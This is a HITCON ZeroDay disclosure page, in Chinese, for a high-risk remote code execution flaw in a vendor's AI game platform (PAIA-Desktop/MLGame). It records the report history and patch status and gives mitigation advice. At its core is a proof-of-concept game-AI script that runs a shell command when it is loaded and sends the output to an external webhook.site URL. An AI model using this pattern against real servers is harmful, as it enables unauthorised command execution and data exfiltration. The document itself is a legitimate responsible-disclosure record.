帕亞科技股份有限公司遠端執行命令

Vulnerability Overview

ZDID: ZD-2025-00957
發信 Vendor: 帕亞科技股份有限公司
Title: 帕亞科技股份有限公司遠端執行命令
Introduction: 可以透過上傳AI檔案subprocess.run、requests套件執行命令並上傳回應

處理狀態

目前狀態

公開

Last Update : 2025/10/24

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2025/08/12 13:45:04 : 新提交 (由 googledinotw 更新此狀態)
2025/08/12 14:00:49 : 新提交 (由 googledinotw 更新此狀態)
2025/08/14 21:26:58 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/08/26 15:49:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/08/26 15:49:04 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/08/26 15:49:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/10/12 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
2025/10/16 14:34:36 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/10/24 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00957
通報者：googledinotw (googledinotw)
風險：高
類型：程式碼執行 (Code Execution)

參考資料

攻擊者可藉由此漏洞執行惡意程式碼，進行如操縱網站作業系統等惡意行為。

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

範例程式:

"""
create_by         : email
create_at         : 2025-08-12 13:57:32
create_at_utc     : 2025-08-12T05:57:32Z
PAIA-Desktop      : 3.2.5+1
MLGame            : 10.6.5
game            : swimming_squid_battle
game_version    : 1.6.4
"""

import random
# 引入函式庫
from subprocess import run
import requests

_E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F = None

class MLPlayArgsSaver:
    def __init__(self):
        self.ai_name = None

        self.init_kwargs = None
        self.scene_info = None
        self.keyboard = None

mlplayArgs = MLPlayArgsSaver()

class MLPlay:
    def __init__(self, ai_name, *args, **kwargs):
        global _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F
        mlplayArgs.ai_name = ai_name
        mlplayArgs.init_kwargs = kwargs
        pass

# 執行並上傳命令
# any - id需自行替換為其他ID
        result = run(['ls'], capture_output=True, text=True)
        requests.get('https://webhook.site/any - id?e=' + result.stdout.strip())

    def update(self, scene_info, keyboard=[], *args, **kwargs):
        global _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F
        mlplayArgs.scene_info = scene_info
        mlplayArgs.keyboard = keyboard
        _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F = random.randint(1, 4)
        if _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F == 1:
            return ['UP']
        elif _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F == 2:
            return ['DOWN']
        elif _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F == 3:
            return ['LEFT']
        elif _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F == 4:
            return ['RIGHT']
        else:
            return ['NONE']
    def reset(self):
        global _E7_A7_BB_E5_8B_95_E6_96_B9_E5_90_91_E7_B7_A8_E8_99_9F
        pass

0

上傳此AI並執行即可在 https://webhook.site/ 或類似webhook網站上查看命令執行結果

修補建議

使用docker
降低使用者
限制命令執行套件
檢查程式碼

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

帕亞科技股份有限公司遠端執行命令 - HITCON ZeroDay

Vulnerability Detail Report